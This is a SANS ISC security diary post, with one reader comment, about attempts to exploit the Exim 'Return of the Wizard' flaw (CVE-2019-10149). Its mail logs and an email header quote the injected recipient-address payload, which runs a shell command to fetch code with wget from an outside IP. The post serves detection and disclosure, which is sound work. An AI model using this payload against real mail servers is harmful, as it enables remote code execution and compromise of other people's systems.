Threat Level: green Handler on Duty: Guy Bruneau

SANS ISC: Quick Detect: Exim "Return of the Wizard" Attack - Internet Security | DShield SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Quick Detect: Exim "Return of the Wizard" Attack

Thanks to our reader Alex for sharing some of his mail logs with the latest attempts to exploit CVE-2019-10149 (aka "Return of the Wizard"). The vulnerability affects Exim and was patched about two weeks ago. There are likely still plenty of vulnerable servers, but it looks like attackers are branching out and are hitting servers not running Exim as well.

A couple of logs from our own mail server (running postfix):

Jun 19 10:47:10 mail postfix/smtp[19006]: A547240360F4: to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f70.91.145.10x22}}@dshield.org>, relay=204.51.94.153[204.51.94.153]:25, delay=0.82, delays=0.29/0.03/0.45/0.05, dsn=5.1.1, status=bounced (host 204.51.94.153[204.51.94.153] said: 550 5.1.1 <root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f70.91.145.10x22}}@dshield.org>: Recipient address rejected: User unknown in virtual alias table (in reply to RCPT TO command))

The exploit is attempting to run the following command:

/bin/sht-ct "wget 64.50.180.45/tmp/70.91.145.10"

Note that the IP at the end of the command is our mail servers public IP address. The URL does no longer appear to exist and belongs to a server running cPanel. 

The beginning of the command may actually be a mistake/typo. I believe the attacker is trying to run sh -ct, which would execute the string (wget..). 

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
Twitter|

I will be teaching next: Intrusion Detection In-Depth - SANS Boston Summer 2019

Johannes

3578 Posts
ISC Handler
Help. I just got hit by this. Although my log does not show that it is bounced instead it got through to my maildir.

Jun 19 11:02:48 ceres postfix/local[5675]: 603BE14007A: to=<emailaddressremoved>, orig_to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2fxxx.xxx.xxx.xxxx22}}@mydomain>, relay=local, delay=0.52, delays=0.42/0.04/0/0.07, dsn=2.0.0, status=sent (delivered to maildir)

How do I fix this?

Here is the email that was received. All this is in the header. THe subject and body was blank.

Return-Path: <support@service.com>
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2fxxx.xxx.xxx.xxxx22}}@mydomain.com
Delivered-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f173.23.66.8x22}}@mydomain.com
Received: from service.com (unknown [45.55.94.254])
by mail.mydomain.com (Postfix) with SMTP id 603BE14007A;
Wed, 19 Jun 2019 11:02:48 -0500 (CDT)
Received: 1
Received: 2
Received: 3
Received: 4
Received: 5
Received: 6
Received: 7
Received: 8
Received: 9
Received: 10
Received: 11
Received: 12
Received: 13
Received: 14
Received: 15
Received: 16
Received: 17
Received: 18
Received: 19
Received: 20
Received: 21
Received: 22
Received: 23
Received: 24
Received: 25
Received: 26
Received: 27
Received: 28
Received: 29
Received: 30
Received: 31
Anonymous

Sign Up for Free or Log In to start participating in the conversation!